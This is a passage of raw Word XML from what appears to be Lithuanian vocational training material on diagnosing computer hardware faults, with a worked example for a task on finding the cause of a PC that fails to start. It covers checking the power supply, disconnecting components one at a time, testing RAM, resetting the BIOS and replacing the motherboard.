          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> operacinės sistemos strigimu</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ar labai lėtu darbu, galima įtarti kompiuterio diskinio kaupiklio (kietojo disko, HDD) gedimą. Nedelsiant pasidarykite jums reikalingų duomenų kopijas į FLASH atmintinę arba išorinį duomenų kaupiklį. Toki</w:t>
      </w:r>
      <w:r w:rsidR="000F31F2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> atveju reikėtų atjungti diską nuo pagrindinės plokštės ir pajungti veikiantį</w:t>
      </w:r>
      <w:r w:rsidR="000F31F2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> diską</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. Patikrinti</w:t>
      </w:r>
      <w:r w:rsidR="000F31F2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ar problema</w:t>
      </w:r>
      <w:r w:rsidR="000F31F2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> išspręsta</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. Beveik visiems naujiems duomenų kaupikliams gamintojas suteikia 24-36 mėnesių garantiją. Atminkite, kad laiku neatlikus kompiuterio kietojo disko būklės įvertinimo, galite prarasti ne vienerius metus kauptą informaciją.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1961EC" w14:textId="39B0BF61" w:rsidR="085CE88C" w:rsidRPr="005A5C28" w:rsidRDefault="085CE88C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65808192" w14:textId="77777777" w:rsidR="00713793" w:rsidRPr="005A5C28" w:rsidRDefault="00713793" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>3 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> NUSTATYTI KOMPIUTERINĖS SISTEMOS APARATINĮ GEDIMĄ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CF163E" w14:textId="177A0BE9" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="00DC0673" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">LAUKIAMI </w:t>
      </w:r>
      <w:r w:rsidR="000F31F2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>REZULTATAI</w:t>
      </w:r>
      <w:r w:rsidR="08C8F98F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="08C8F98F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="16" w:name="_Hlk67836116"/>
      <w:r w:rsidR="000F31F2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="08C8F98F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>okinys turi</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F31F2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">įvardinti gedimą, nustatyti jo </w:t>
      </w:r>
      <w:r w:rsidR="08C8F98F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>priežast</w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>į</w:t>
      </w:r>
      <w:r w:rsidR="000F31F2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>/is</w:t>
      </w:r>
      <w:r w:rsidR="08C8F98F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir pateikti gedimo šalinim</w:t>
      </w:r>
      <w:r w:rsidR="000F31F2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>o būdus</w:t>
      </w:r>
      <w:r w:rsidR="08C8F98F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="16"/>
    <w:p w14:paraId="010F8E99" w14:textId="31C334D8" w:rsidR="75B253ED" w:rsidRPr="005A5C28" w:rsidRDefault="08C8F98F" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pavyzdys</w:t>
      </w:r>
      <w:r w:rsidR="003846B3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2371E7F9" w14:textId="5733124E" w:rsidR="75B253ED" w:rsidRPr="005A5C28" w:rsidRDefault="08C8F98F" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Įsitikinkite</w:t>
      </w:r>
      <w:r w:rsidR="000F31F2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ar kompiuterio mait</w:t>
      </w:r>
      <w:r w:rsidR="790E4889" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nimo blokas (PSU) veikia tinkamai. Ar laidas nepažeistas</w:t>
      </w:r>
      <w:r w:rsidR="000F31F2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Atidar</w:t>
      </w:r>
      <w:r w:rsidR="000F31F2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ę</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> korpusą </w:t>
      </w:r>
      <w:r w:rsidR="000F31F2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>patikrinkite,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ar nėra jokio fizinio pažeidimo, ar elektronikos elementai neišsilydė ant pagrindinės plokštės, ar nėra degėsio kvapo.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Jei turite gerą </w:t>
      </w:r>
      <w:r w:rsidR="000F31F2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">atsarginį </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>maitinimo bloką,</w:t>
      </w:r>
      <w:r w:rsidR="000F31F2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> juo</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pakeiskite</w:t>
      </w:r>
      <w:r w:rsidR="000F31F2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> taisomo</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E48F1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kompiuterio</w:t>
      </w:r>
      <w:r w:rsidR="000F31F2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">maitinimo bloką ir pažiūrėkite, ar </w:t>
      </w:r>
      <w:r w:rsidR="0EB31740" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>įsijungia kompiuteris</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Jei </w:t>
      </w:r>
      <w:r w:rsidR="3CF091B0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>maitinimo bloko keitimas padėjo pašalinti gedimą</w:t>
      </w:r>
      <w:r w:rsidR="000F31F2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">vadinasi, radote gedimo priežastį. Jei pakeitus maitinimo bloką </w:t>
      </w:r>
      <w:r w:rsidR="000F31F2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>situacija nepasikeitė,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>reikia bandyti</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F31F2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nuosekliai atjungti</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>po vien</w:t>
      </w:r>
      <w:r w:rsidR="000F31F2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> komponentą (HDD, SSD, RAM, vaizdo plokšt</w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ę</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, papildom</w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> plokšt</w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">s) ir tikrinti, ar </w:t>
      </w:r>
      <w:r w:rsidR="1F0179B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>įsijungia kompiuteris</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Jei </w:t>
      </w:r>
      <w:r w:rsidR="4E19572E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">nuoseklus </w:t>
      </w:r>
      <w:r w:rsidR="2862F4C2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>komponentų</w:t>
      </w:r>
      <w:r w:rsidR="1DAB141B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> atjungimas</w:t>
      </w:r>
      <w:r w:rsidR="2862F4C2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (HDD, SSD, RAM, vaizdo plokšt</w:t>
      </w:r>
      <w:r w:rsidR="778348A8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ės</w:t>
      </w:r>
      <w:r w:rsidR="2862F4C2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, papildomas plokšt</w:t>
      </w:r>
      <w:r w:rsidR="18498849" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ė</w:t>
      </w:r>
      <w:r w:rsidR="2862F4C2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>s) keitimas nepadėjo pašalinti gedimo</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0BE72388" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> tai pajunkite į lizdą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> po vieną</w:t>
      </w:r>
      <w:r w:rsidR="0C8734B6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> operatyvinės atminties plokštelę</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. Jei ir tai nepadėjo</w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6D09CAB5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">atkurkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pagrindinės plokštės BIOS</w:t>
      </w:r>
      <w:r w:rsidR="1BF7CA36" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> gamyklinius nustatymus</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="666F5A20" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Patikrin</w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kite,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ar</w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pagrindinėje plokštėje</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>dega</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> šviesos diodai. Atjun</w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> mygtuko laidą ir band</w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ykite</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> užtrumpinti kontaktus pagrindinė</w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>je</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> plokštė</w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">je. </w:t>
      </w:r>
      <w:r w:rsidR="1265BE83" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Žiūrėkite gamintojo vartotojo vadovą.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ei ir tai nepadėjo</w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> vadinasi</w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> sugedo pagrindinė plokštė. </w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ei turite kitą tokio pat tipo pagrindinę plokšt</w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ę,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>keičiate j</w:t>
      </w:r>
      <w:r w:rsidR="00531AAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>a sugedusia</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>arba įsigyjate naują.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F4E4B9" w14:textId="24BF3CEE" w:rsidR="085CE88C" w:rsidRPr="005A5C28" w:rsidRDefault="085CE88C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CE4B104" w14:textId="77777777" w:rsidR="00713793" w:rsidRPr="005A5C28" w:rsidRDefault="00713793" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>4 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
